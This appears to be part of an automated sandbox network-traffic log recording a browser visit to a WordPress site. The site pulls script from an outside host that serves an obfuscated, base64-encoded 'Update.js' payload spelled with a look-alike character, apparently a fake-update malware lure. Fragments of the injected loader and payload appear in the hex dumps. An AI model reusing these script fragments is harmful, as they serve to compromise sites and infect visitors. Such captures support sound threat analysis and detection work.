                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:17 UTC181INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        2025-03-11 18:03:17 UTC3950INData Raw: 66 36 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 5d 3d 31 3b 76 61 72 20 64 6f 6d 61 69 6e 3d 27 68 74 74 70 73 3a 2f 2f 76 69 72 74 75 61 6c 2e 75 72 62 61 6e 2d 6f 72 74 68 6f 64 6f 6e 74 69 63 73 2e 63 6f 6d 2f 27 3b 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 53 74 61 74 69 73 74 69 63 73 28 74 79 70 65 29 7b 76 61 72 20 69 3d 6e 65 77 20 49 6d 61 67 65 28 29 3b 69 2e 73 72 63 3d 64 6f 6d 61 69 6e 2b 74 79 70 65 3b 7d 76 61 72 20 65 6c 65 6d 73 3d 5b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 5d 3b 76 61 72 20 61
                                                        Data Ascii: f67(function(){window.localStorage[window.location.hostname]=1;var domain='https://virtual.urban-orthodontics.com/';function sendStatistics(type){var i=new Image();i.src=domain+type;}var elems=[document.documentElement,document.head,document.body];var a
                                                        2025-03-11 18:03:17 UTC4104INData Raw: 31 30 30 30 0d 0a 4e 74 74 33 4e 33 75 39 31 77 33 4b 4e 72 38 6c 36 72 74 33 5a 6f 53 64 32 71 39 76 4f 48 43 44 70 39 75 68 62 6d 44 2f 68 61 32 2f 59 31 59 57 35 75 68 76 69 79 4d 6a 69 32 73 71 34 74 43 66 59 35 76 4a 73 77 32 6e 64 70 69 61 48 74 6e 50 70 7a 47 53 37 34 37 6c 42 68 4c 75 55 74 69 76 34 32 31 46 38 71 74 5a 34 70 39 52 6d 74 6d 62 57 6e 43 6a 74 7a 41 33 70 30 74 4f 36 6d 79 7a 35 32 6b 50 68 55 6b 48 39 32 6a 65 54 5a 56 4a 70 71 57 44 78 77 78 46 76 71 44 52 59 72 45 48 79 37 64 52 5a 63 6a 44 67 53 53 6e 68 53 43 50 68 51 30 50 68 76 56 77 69 63 4b 37 76 36 74 48 41 53 45 74 75 6e 6a 74 79 58 79 79 4a 56 79 33 58 78 52 54 46 50 6b 41 63 59 35 2b 6d 52 69 76 70 75 68 61 46 7a 6f 4b 42 79 33 39 53 6e 30 44 31 31 31 44 48 4a 43 4b 31
                                                        Data Ascii: 1000Ntt3N3u91w3KNr8l6rt3ZoSd2q9vOHCDp9uhbmD/ha2/Y1YW5uhviyMji2sq4tCfY5vJsw2ndpiaHtnPpzGS747lBhLuUtiv421F8qtZ4p9RmtmbWnCjtzA3p0tO6myz52kPhUkH92jeTZVJpqWDxwxFvqDRYrEHy7dRZcjDgSSnhSCPhQ0PhvVwicK7v6tHASEtunjtyXyyJVy3XxRTFPkAcY5+mRivpuhaFzoKBy39Sn0D111DHJCK1
                                                        2025-03-11 18:03:17 UTC4104INData Raw: 31 30 30 30 0d 0a 72 43 63 57 37 64 75 70 55 35 63 76 79 6c 76 2f 7a 79 43 2f 35 71 58 44 44 36 51 62 79 6f 76 66 71 6a 57 50 44 4e 4d 67 76 33 35 62 75 38 72 39 75 59 4a 4e 69 61 33 42 58 4f 54 33 59 77 79 33 51 30 7a 33 65 79 4c 46 70 6f 57 52 70 30 67 4f 5a 62 33 4e 44 6a 70 38 49 33 54 77 69 48 48 51 4e 67 35 54 64 50 6e 34 39 51 2f 6c 5a 38 63 7a 43 46 77 56 63 67 53 34 65 74 5a 42 6d 2f 73 5a 78 32 4a 6d 32 42 50 4d 74 4b 30 58 4b 4e 30 72 66 77 30 54 35 36 39 41 67 55 62 75 45 58 47 43 6f 6f 4b 46 43 50 2b 4f 6e 54 70 2f 46 4b 58 6c 34 65 79 4f 44 62 44 6f 6a 68 54 67 35 39 66 58 33 4d 67 41 4d 48 44 75 41 56 42 44 5a 73 6a 58 6d 52 77 51 69 6e 6e 52 72 56 71 31 65 76 77 50 30 57 74 62 70 77 34 51 4a 4f 4e 51 5a 72 33 47 4e 6a 59 32 4e 67 59 43 44
                                                        Data Ascii: 1000rCcW7dupU5cvylv/zyC/5qXDD6QbyovfqjWPDNMgv35bu8r9uYJNia3BXOT3Ywy3Q0z3eyLFpoWRp0gOZb3NDjp8I3TwiHHQNg5TdPn49Q/lZ8czCFwVcgS4etZBm/sZx2Jm2BPMtK0XKN0rfw0T569AgUbuEXGCooKFCP+OnTp/FKXl4eyODbDojhTg59fX3MgAMHDuAVBDZsjXmRwQinnRrVq1evwP0Wtbpw4QJONQZr3GNjY2NgYCD
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 65 42 49 6d 39 74 2b 59 62 66 50 64 39 49 4b 59 59 6f 49 69 4c 39 49 71 36 67 46 47 73 66 42 49 50 79 63 5a 49 4e 4d 33 79 7a 51 37 6a 42 53 52 2b 44 59 78 37 76 48 58 4a 37 64 4a 38 75 46 47 72 48 64 31 2f 42 4b 6b 70 47 2f 69 64 38 6f 6b 6c 41 48 4a 49 70 35 4f 73 65 42 4d 2b 4a 58 4d 4c 4c 4e 4e 63 30 33 7a 54 69 34 59 73 4e 54 2f 6e 4f 43 76 46 2b 37 34 69 37 57 62 43 72 6e 4c 64 51 61 4d 32 58 6e 2f 51 57 72 71 57 47 79 50 2b 42 54 36 52 58 78 4c 6d 78 66 46 64 47 44 4b 70 2b 77 46 65 39 75 53 6d 4b 77 65 6c 46 37 35 33 30 6d 58 58 4d 63 31 61 41 71 44 4b 44 4c 68 52 71 77 58 66 66 69 32 2b 55 7a 39 67 54 45 55 30 71 34 73 7a 71 38 36 50 49 4c 38 62 4a 74 30 48 45 73 4a 47 43 68 2f 6e 4d 43 76 47 61 46 65 53 2b 50 6c 4a 45 46 62 6d
                                                        Data Ascii: 1000eBIm9t+YbfPd9IKYYoIiL9Iq6gFGsfBIPycZINM3yzQ7jBSR+DYx7vHXJ7dJ8uFGrHd1/BKkpG/id8oklAHJIp5OseBM+JXMLLNNc03zTi4YsNT/nOCvF+74i7WbCrnLdQaM2Xn/QWrqWGyP+BT6RXxLmxfFdGDKp+wFe9uSmKwelF7530mXXMc1aAqDKDLhRqwXffi2+Uz9gTEU0q4szq86PIL8bJt0HEsJGCh/nMCvGaFeS+PlJEFbm
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 39 76 48 45 6e 35 38 75 76 68 48 65 4e 4d 6d 44 37 65 75 4a 49 78 4f 75 58 51 48 2b 38 64 34 30 79 59 61 79 66 37 78 50 45 31 30 70 79 61 37 64 4e 59 4d 42 37 6f 37 48 30 55 79 59 57 66 69 48 34 6f 2f 50 31 31 38 49 37 78 71 64 52 68 58 38 51 2f 46 44 35 2b 75 76 5a 75 38 61 61 6a 53 66 69 49 34 6f 66 50 31 7a 37 4e 33 6a 54 4a 68 58 38 52 50 46 44 35 39 75 66 5a 75 38 61 5a 52 70 56 2f 45 54 78 51 2b 66 62 6e 32 62 76 47 6d 54 53 72 2b 49 72 69 68 38 2b 33 48 73 33 65 4e 4e 53 63 42 2b 38 58 78 51 70 2f 2b 64 75 50 5a 75 38 61 5a 4d 50 74 2f 68 33 71 4e 33 71 65 34 4f 37 6d 70 58 6b 68 6c 75 37 33 54 4c 4f 34 75 4a 54 74 64 4a 4c 41 78 37 6e 48 75 6b 71 71 58 51 6f 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49
                                                        Data Ascii: 10009vHEn58uvhHeNMmD7euJIxOuXQH+8d40yYayf7xPE10pya7dNYMB7o7H0UyYWfiH4o/P118I7xqdRhX8Q/FD5+uvZu8aajSfiI4ofP1z7N3jTJhX8RPFD59ufZu8aZRpV/ETxQ+fbn2bvGmTSr+Irih8+3Hs3eNNScB+8XxQp/+duPZu8aZMPt/h3qN3qe4O7mpXkhlu73TLO4uJTtdJLAx7nHukqqXQoCAgICAgICAgICAgICAgICAgI
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 4d 54 53 71 43 65 66 55 49 49 5a 51 32 54 54 35 41 78 31 41 4f 71 43 54 56 31 4b 69 68 50 6a 51 59 30 32 74 74 5a 46 4c 49 33 54 58 45 41 4e 4d 52 70 55 47 75 58 4d 48 55 72 51 6a 4d 67 6d 4f 72 32 5a 65 57 52 36 64 4d 38 67 6a 48 4a 6c 71 43 4b 31 36 31 4f 64 42 52 75 74 57 42 6d 5a 43 4c 47 51 53 53 4f 79 74 61 51 30 56 4f 58 4e 79 6e 76 49 4b 54 36 6d 59 70 6e 78 6e 54 69 30 55 71 78 7a 67 61 59 4d 44 6e 5a 38 6f 4e 4d 75 5a 42 62 4a 71 68 5a 4f 32 4d 57 4c 5a 57 39 71 47 53 53 4d 7a 46 6f 5a 6c 72 6e 72 54 6e 35 45 43 32 31 71 33 6b 67 59 2b 54 54 70 41 38 35 75 30 44 57 6b 68 70 42 49 41 78 70 57 71 43 61 44 55 49 35 34 35 6e 51 36 65 34 35 47 6b 74 72 51 41 45 4d 7a 41 4f 32 6e 48 6b 6f 45 45 4c 64 61 74 32 79 54 4e 6d 30 39 34 37
                                                        Data Ascii: 1000MTSqCefUIIZQ2TT5Ax1AOqCTV1KihPjQY02ttZFLI3TXEANMRpUGuXMHUrQjMgmOr2ZeWR6dM8gjHJlqCK161OdBRutWBmZCLGQSSOytaQ0VOXNynvIKT6mYpnxnTi0UqxzgaYMDnZ8oNMuZBbJqhZO2MWLZW9qGSSMzFoZlrnrTn5EC21q3kgY+TTpA85u0DWkhpBIAxpWqCaDUI545nQ6e45GktrQAEMzAO2nHkoEELdat2yTNm0947
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 41 79 57 72 5a 4d 7a 32 73 47 77 46 39 52 6a 52 65 6c 48 34 62 78 5a 6a 6a 57 66 6d 34 39 56 2b 6d 48 52 78 63 4f 39 33 77 34 6c 7a 70 47 67 69 68 4a 6e 63 63 46 45 66 68 50 45 6a 2f 57 33 7a 6c 54 58 75 39 34 57 4e 34 62 62 6b 74 6b 77 64 4b 36 6d 30 68 37 33 55 38 4b 74 2b 70 38 66 30 7a 38 35 58 31 58 37 78 38 6b 63 6e 44 76 63 70 7a 6e 5a 50 4f 58 4e 70 51 74 7a 4f 70 55 64 46 56 65 50 78 6d 78 36 5a 2b 63 6b 32 76 33 6a 35 4c 59 74 78 64 32 62 52 6a 68 62 75 6d 47 62 6e 63 53 50 52 4b 6d 66 78 50 6a 54 7a 72 50 2f 41 4e 55 71 2b 35 75 52 31 6a 35 49 4a 64 30 64 32 32 50 44 6e 6d 63 31 38 73 4e 49 46 52 7a 55 4a 54 39 50 34 33 53 73 2f 4e 4d 62 32 35 33 6a 35 49 6e 61 44 75 62 62 6a 4a 62 57 64 32 30 62 51 37 74 78 68 33 6c 54 39 4a
                                                        Data Ascii: 1000AyWrZMz2sGwF9RjRelH4bxZjjWfm49V+mHRxcO93w4lzpGgihJnccFEfhPEj/W3zlTXu94WN4bbktkwdK6m0h73U8Kt+p8f0z85X1X7x8kcnDvcpznZPOXNpQtzOpUdFVePxmx6Z+ck2v3j5LYtxd2bRjhbumGbncSPRKmfxPjTzrP/ANUq+5uR1j5IJd0d22PDnmc18sNIFRzUJT9P43Ss/NMb253j5InaDubbjJbWd20bQ7txh3lT9J
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 49 50 58 34 37 4f 5a 62 62 4f 78 45 32 69 59 6a 71 34 64 2f 65 74 46 5a 69 65 65 48 72 33 47 66 68 64 76 48 76 42 76 63 7a 58 64 47 6a 62 4f 59 37 52 6b 4c 6f 77 35 6f 6b 44 6f 79 34 67 67 45 34 2b 56 67 74 76 4d 70 75 54 75 63 49 7a 58 44 78 36 52 47 48 67 32 38 75 68 36 74 6f 45 78 67 31 61 32 6b 73 35 33 31 49 62 4c 48 32 62 6a 79 4f 49 63 4e 75 48 4d 73 59 7a 6e 45 78 68 61 30 54 48 4a 6a 61 44 72 31 72 70 72 70 47 75 74 37 61 39 68 65 34 56 62 63 56 42 42 35 4f 73 30 34 64 39 64 65 7a 76 65 33 50 47 75 70 68 61 6c 37 78 6a 4c 30 36 77 34 79 62 76 67 52 32 31 35 42 4a 70 38 6a 52 6c 79 75 4f 61 4d 55 48 49 37 61 76 5a 32 66 7a 46 4d 63 61 34 65 54 75 66 6a 62 5a 7a 6e 4c 71 4c 4c 65 54 54 39 53 67 45 39 6e 4f 79 56 68 32 30 49 71 4f
                                                        Data Ascii: 1000IPX47OZbbOxE2iYjq4d/etFZieeHr3GfhdvHvBvczXdGjbOY7RkLow5okDoy4ggE4+VgtvMpuTucIzXDx6RGHg28uh6toExg1a2ks531IbLH2bjyOIcNuHMsYznExha0THJjaDr1rprpGut7a9he4VbcVBB5Os04d9dezve3PGuphal7xjL06w4ybvgR215BJp8jRlyuOaMUHI7avZ2fzFMca4eTufjbZznLqLLeTT9SgE9nOyVh20IqO
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 61 34 6e 6f 43 43 36 4e 34 59 38 50 79 68 39 4e 6a 58 59 69 76 4a 55 49 4c 70 4c 69 53 56 67 45 76 58 65 44 55 53 48 79 71 48 31 50 63 51 61 44 65 4c 39 70 44 33 44 36 61 44 54 6f 50 30 71 34 54 2f 77 75 33 52 2f 30 61 77 2f 35 5a 69 44 71 6b 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 42 2b 64 66 48 37 2b 4d 75 39 6e 2b 65 64 2b 6f 31 42 35 2b 67 37 43 48 39 6a 48 2b 69 33 30 6b 46 36 41 67 49 4b 74 38 70 76 64 48 70 71 61 38 34 52 62 6c 50 38 4f 6c 45 44 53 56 39 55 2b 4f 31 53 76 38 41 4e 33 44 6b 71 70 68 47 70 55 51 46 57 68 58 55 76 45 4a 43 6c 57 62 4a 57 78 46 53 72 4e 6b 6a 59 75
                                                        Data Ascii: 1000a4noCC6N4Y8Pyh9NjXYivJUILpLiSVgEvXeDUSHyqH1PcQaDeL9pD3D6aDToP0q4T/wu3R/0aw/5ZiDqkBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBB+dfH7+Mu9n+ed+o1B5+g7CH9jH+i30kF6AgIKt8pvdHpqa84RblP8OlEDSV9U+O1Sv8AN3DkqphGpUQFWhXUvEJClWbJWxFSrNkjYu
                                                        2025-03-11 18:03:18 UTC4104INData Raw: 31 30 30 30 0d 0a 4b 38 69 61 7a 51 76 45 48 51 6d 70 62 51 76 46 73 6d 70 4f 68 65 4c 62 6f 55 61 6b 36 56 77 74 65 68 4e 52 70 58 65 62 64 43 61 6c 74 43 34 57 77 35 6c 45 32 4e 4b 34 57 79 61 6b 36 45 6a 4c 4f 72 61 34 55 48 4f 56 57 62 72 52 74 72 32 32 77 35 68 33 55 31 4a 30 4a 6d 32 30 65 77 31 72 30 4b 75 70 62 53 75 38 32 48 49 45 31 47 6c 55 57 35 35 6b 31 4a 30 72 78 62 6b 38 69 6a 55 74 70 58 4e 74 71 38 69 6a 55 6e 51 6b 62 61 6e 6d 55 61 30 36 55 67 74 54 7a 4b 4e 53 32 68 64 35 71 65 5a 52 71 57 30 72 78 61 39 43 6a 57 74 46 56 66 4e 54 7a 4b 4e 61 30 55 58 69 7a 4b 72 72 61 52 74 71 2b 5a 4a 72 54 37 53 33 7a 54 6f 54 57 65 30 47 31 77 32 4a 72 56 39 74 59 62 62 6f 55 36 6c 64 43 77 77 45 34 55 77 54 55 72 6f 57 47 33 50 4d 70 31 49 30 72
                                                        Data Ascii: 1000K8iazQvEHQmpbQvFsmpOheLboUak6VwtehNRpXebdCaltC4Ww5lE2NK4Wyak6EjLOra4UHOVWbrRtr22w5h3U1J0Jm20ew1r0KupbSu82HIE1GlUW55k1J0rxbk8ijUtpXNtq8ijUnQkbanmUa06UgtTzKNS2hd5qeZRqW0rxa9CjWtFVfNTzKNa0UXizKrraRtq+ZJrT7S3zToTWe0G1w2JrV9tYbboU6ldCwwE4UwTUroWG3PMp1I0r


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.449834198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:15 UTC2314OUTPOST /wp-json/mailster/v1/forms/12823/impression?_locale=user HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        Content-Length: 103
                                                        X-WP-Nonce: 5a36b08978
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: application/json, */*;q=0.1
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: application/json
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://hardylive.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:15 UTC103OUTData Raw: 7b 22 69 64 22 3a 31 32 38 32 33 2c 22 69 64 65 6e 74 69 66 69 65 72 22 3a 22 65 36 34 62 62 31 39 61 22 2c 22 63 6f 6f 6c 64 6f 77 6e 22 3a 30 2c 22 69 73 50 72 65 76 69 65 77 22 3a 66 61 6c 73 65 2c 22 74 79 70 65 22 3a 22 73 75 62 6d 69 73 73 69 6f 6e 22 2c 22 70 72 65 66 69 6c 6c 22 3a 66 61 6c 73 65 7d
                                                        Data Ascii: {"id":12823,"identifier":"e64bb19a","cooldown":0,"isPreview":false,"type":"submission","prefill":false}
                                                        2025-03-11 18:03:17 UTC671INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:15 GMT
                                                        Content-Type: application/json; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        X-Robots-Tag: noindex
                                                        Link: <https://hardylive.com/wp-json/>; rel="https://api.w.org/"
                                                        X-Content-Type-Options: nosniff
                                                        Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
                                                        Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
                                                        X-WP-Nonce: 5a36b08978
                                                        Allow: POST
                                                        Access-Control-Allow-Origin: https://hardylive.com
                                                        Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
                                                        Access-Control-Allow-Credentials: true
                                                        Vary: Origin
                                                        2025-03-11 18:03:17 UTC34INData Raw: 31 37 0d 0a 7b 22 64 61 74 61 22 3a 7b 22 73 74 61 74 75 73 22 3a 32 30 30 7d 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 17{"data":{"status":200}}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.449839198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:19 UTC2028OUTGET /wp-json/mailster/v1/forms/12823/impression?_locale=user HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:21 UTC479INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:19 GMT
                                                        Content-Type: application/json; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        X-Robots-Tag: noindex
                                                        Link: <https://hardylive.com/wp-json/>; rel="https://api.w.org/"
                                                        X-Content-Type-Options: nosniff
                                                        Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
                                                        Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
                                                        Vary: Origin
                                                        2025-03-11 18:03:21 UTC125INData Raw: 37 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 72 65 73 74 5f 6e 6f 5f 72 6f 75 74 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 20 72 6f 75 74 65 20 77 61 73 20 66 6f 75 6e 64 20 6d 61 74 63 68 69 6e 67 20 74 68 65 20 55 52 4c 20 61 6e 64 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 2e 22 2c 22 64 61 74 61 22 3a 7b 22 73 74 61 74 75 73 22 3a 34 30 34 7d 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 72{"code":"rest_no_route","message":"No route was found matching the URL and request method.","data":{"status":404}}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.449846185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:21 UTC611OUTGET /ULrfTSuYvCQ0mOV/ZonzbyPOuj1ygP0hMdS7JD7dgCs51rpvfJitb2qYuzU4zLs1ON2vJz3I/TA= HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:24 UTC181INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        2025-03-11 18:03:24 UTC2024INData Raw: 37 65 31 0d 0a 76 61 72 20 66 69 6c 65 6e 61 6d 65 3d 22 55 70 64 5c 75 30 34 33 30 74 65 2e 6a 73 22 3b 76 61 72 20 66 69 6c 65 50 6c 61 69 6e 3d 77 69 6e 64 6f 77 2e 61 74 6f 62 28 27 4c 79 39 41 59 32 4e 66 62 32 34 67 64 6d 46 79 49 48 6c 30 50 53 4a 61 62 6a 68 76 61 6d 6c 42 59 58 70 54 56 56 64 69 4d 7a 4a 6e 4d 54 52 48 51 6e 5a 44 4c 32 31 45 4d 46 6c 78 5a 47 74 53 5a 6b 31 4f 52 6c 52 57 53 6e 51 72 57 48 6c 7a 52 57 4e 77 63 6a 6c 49 4e 54 5a 50 53 58 56 73 5a 55 74 51 61 45 78 34 64 7a 64 52 49 6a 74 6d 64 57 35 6a 64 47 6c 76 62 69 42 6a 63 69 68 6e 5a 53 6c 37 64 6d 46 79 49 48 70 76 50 53 49 69 4f 33 5a 68 63 69 42 6f 61 79 78 6e 62 79 78 78 59 79 78 70 63 69 78 71 61 43 78 33 64 43 78 33 65 54 74 32 59 58 49 67 59 32 38 39 4d 44 74 33 61
                                                        Data Ascii: 7e1var filename="Upd\u0430te.js";var filePlain=window.atob('Ly9AY2Nfb24gdmFyIHl0PSJabjhvamlBYXpTVVdiMzJnMTRHQnZDL21EMFlxZGtSZk1ORlRWSnQrWHlzRWNwcjlINTZPSXVsZUtQaEx4dzdRIjtmdW5jdGlvbiBjcihnZSl7dmFyIHpvPSIiO3ZhciBoayxnbyxxYyxpcixqaCx3dCx3eTt2YXIgY289MDt3a
                                                        2025-03-11 18:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.449847185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:23 UTC712OUTGET /DMHDyHfjoKFo4/n6OvLv6n+1prgu++Gkba+noWKmnLt4oLe7Lu3hu3jj+fkg47HqNuO5oWCusqtrrLSrLrw= HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
